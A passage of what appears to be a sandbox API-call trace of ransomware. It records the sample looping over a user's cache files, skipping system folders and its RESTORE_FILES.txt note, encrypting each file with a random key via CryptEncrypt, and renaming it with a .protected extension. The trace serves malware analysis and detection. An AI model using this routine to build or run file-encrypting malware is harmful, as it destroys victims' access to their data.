lpOverlapped=0x0) returned 1 [0088.605] CloseHandle (hObject=0x150) returned 1 [0088.606] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9.protected") returned 161 [0088.606] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\955cab6ff6a24d5820d50b5ba1cf79c7_ad9e7615297a3a83320aace5801a04f9"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\955cab6ff6a24d5820d50b5ba1cf79c7_ad9e7615297a3a83320aace5801a04f9.protected")) returned 1 [0088.606] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.606] lstrcmpiW (lpString1="9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6", lpString2="Windows") returned -1 [0088.606] lstrcmpiW (lpString1="9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6", lpString2="Program Files") returned -1 [0088.606] lstrcmpiW (lpString1="9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6", lpString2="Program Files (x86)") returned -1 [0088.606] lstrcmpiW (lpString1="9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6", lpString2="$Recycle.bin") returned 1 [0088.606] lstrcmpiW (lpString1="9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6", lpString2="System Volume Information") returned -1 [0088.607] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6") returned 151 [0088.607] StrStrIW (lpFirst="9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6", lpSrch=".protected") returned 0x0 [0088.607] lstrcmpW (lpString1="9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6", lpString2="RESTORE_FILES.txt") returned -1 [0088.607] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.607] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.607] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\9bc2ffc5d9591e1bd3545230e9b7cc36_cf30943571f9bee96c487b2d9f0436e6"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.608] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6") returned 151 [0088.608] StrStrW (lpFirst="9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6", lpSrch=".txt") returned 0x0 [0088.608] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6") returned 151 [0088.608] StrStrW (lpFirst="9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6", lpSrch=".rar") returned 0x0 [0088.608] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6") returned 151 [0088.608] StrStrW (lpFirst="9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6", lpSrch=".zip") returned 0x0 [0088.608] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x5ab, lpOverlapped=0x0) returned 1 [0088.658] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffa55, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.658] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x5ab, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x5ab, lpOverlapped=0x0) returned 1 [0088.659] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.659] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.659] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.659] CloseHandle (hObject=0x150) returned 1 [0088.659] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6.protected") returned 161 [0088.659] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\9bc2ffc5d9591e1bd3545230e9b7cc36_cf30943571f9bee96c487b2d9f0436e6"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\9bc2ffc5d9591e1bd3545230e9b7cc36_cf30943571f9bee96c487b2d9f0436e6.protected")) returned 1 [0088.660] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.660] lstrcmpiW (lpString1="9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E", lpString2="Windows") returned -1 [0088.660] lstrcmpiW (lpString1="9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E", lpString2="Program Files") returned -1 [0088.660] lstrcmpiW (lpString1="9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E", lpString2="Program Files (x86)") returned -1 [0088.660] lstrcmpiW (lpString1="9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E", lpString2="$Recycle.bin") returned 1 [0088.660] lstrcmpiW (lpString1="9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E", lpString2="System Volume Information") returned -1 [0088.660] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E") returned 151 [0088.660] StrStrIW (lpFirst="9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E", lpSrch=".protected") returned 0x0 [0088.660] lstrcmpW (lpString1="9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E", lpString2="RESTORE_FILES.txt") returned -1 [0088.660] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.661] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.661] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\9c888beabccbc2a97b0d6d9214c3ba37_1213dc6f71e4c3b05e7bceebc203a31e"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.662] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E") returned 151 [0088.662] StrStrW (lpFirst="9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E", lpSrch=".txt") returned 0x0 [0088.662] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E") returned 151 [0088.662] StrStrW (lpFirst="9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E", lpSrch=".rar") returned 0x0 [0088.662] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E") returned 151 [0088.662] StrStrW (lpFirst="9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E", lpSrch=".zip") returned 0x0 [0088.662] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x652, lpOverlapped=0x0) returned 1 [0088.666] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffff9ae, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.666] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x652, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x652, lpOverlapped=0x0) returned 1 [0088.666] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.666] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.666] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.666] CloseHandle (hObject=0x150) returned 1 [0088.666] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E.protected") returned 161 [0088.666] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\9c888beabccbc2a97b0d6d9214c3ba37_1213dc6f71e4c3b05e7bceebc203a31e"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\9c888beabccbc2a97b0d6d9214c3ba37_1213dc6f71e4c3b05e7bceebc203a31e.protected")) returned 1 [0088.667] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.667] lstrcmpiW (lpString1="9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061", lpString2="Windows") returned -1 [0088.667] lstrcmpiW (lpString1="9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061", lpString2="Program Files") returned -1 [0088.667] lstrcmpiW (lpString1="9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061", lpString2="Program Files (x86)") returned -1 [0088.667] lstrcmpiW (lpString1="9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061", lpString2="$Recycle.bin") returned 1 [0088.667] lstrcmpiW (lpString1="9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061", lpString2="System Volume Information") returned -1 [0088.667] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061") returned 151 [0088.667] StrStrIW (lpFirst="9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061", lpSrch=".protected") returned 0x0 [0088.667] lstrcmpW (lpString1="9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061", lpString2="RESTORE_FILES.txt") returned -1 [0088.667] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.667] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.668] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\9c888beabccbc2a97b0d6d9214c3ba37_ebc75728c6119a77e4da8559dd10f061"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.668] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061") returned 151 [0088.668] StrStrW (lpFirst="9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061", lpSrch=".txt") returned 0x0 [0088.668] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061") returned 151 [0088.668] StrStrW (lpFirst="9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061", lpSrch=".rar") returned 0x0 [0088.668] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061") returned 151 [0088.668] StrStrW (lpFirst="9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061", lpSrch=".zip") returned 0x0 [0088.668] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x652, lpOverlapped=0x0) returned 1 [0088.685] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffff9ae, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.685] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x652, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x652, lpOverlapped=0x0) returned 1 [0088.685] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.685] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.685] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.685] CloseHandle (hObject=0x150) returned 1 [0088.686] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061.protected") returned 161 [0088.686] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\9c888beabccbc2a97b0d6d9214c3ba37_ebc75728c6119a77e4da8559dd10f061"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\9c888beabccbc2a97b0d6d9214c3ba37_ebc75728c6119a77e4da8559dd10f061.protected")) returned 1 [0088.687] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.687] lstrcmpiW (lpString1="A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450", lpString2="Windows") returned -1 [0088.687] lstrcmpiW (lpString1="A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450", lpString2="Program Files") returned -1 [0088.687] lstrcmpiW (lpString1="A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450", lpString2="Program Files (x86)") returned -1 [0088.687] lstrcmpiW (lpString1="A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450", lpString2="$Recycle.bin") returned 1 [0088.687] lstrcmpiW (lpString1="A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450", lpString2="System Volume Information") returned -1 [0088.687] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450") returned 151 [0088.687] StrStrIW (lpFirst="A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450", lpSrch=".protected") returned 0x0 [0088.687] lstrcmpW (lpString1="A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450", lpString2="RESTORE_FILES.txt") returned -1 [0088.687] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.687] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.687] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\a9e4f776657345b52012ce8e279d314c_183a5be0b233cc1d513955fabecf9450"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.696] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450") returned 151 [0088.696] StrStrW (lpFirst="A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450", lpSrch=".txt") returned 0x0 [0088.696] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450") returned 151 [0088.696] StrStrW (lpFirst="A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450", lpSrch=".rar") returned 0x0 [0088.696] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450") returned 151 [0088.696] StrStrW (lpFirst="A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450", lpSrch=".zip") returned 0x0 [0088.696] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x1d7, lpOverlapped=0x0) returned 1 [0088.697] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe29, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.697] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x1d7, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x1d7, lpOverlapped=0x0) returned 1 [0088.697] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.697] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.697] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.698] CloseHandle (hObject=0x150) returned 1 [0088.700] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450.protected") returned 161 [0088.700] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\a9e4f776657345b52012ce8e279d314c_183a5be0b233cc1d513955fabecf9450"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\a9e4f776657345b52012ce8e279d314c_183a5be0b233cc1d513955fabecf9450.protected")) returned 1 [0088.703] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.703] lstrcmpiW 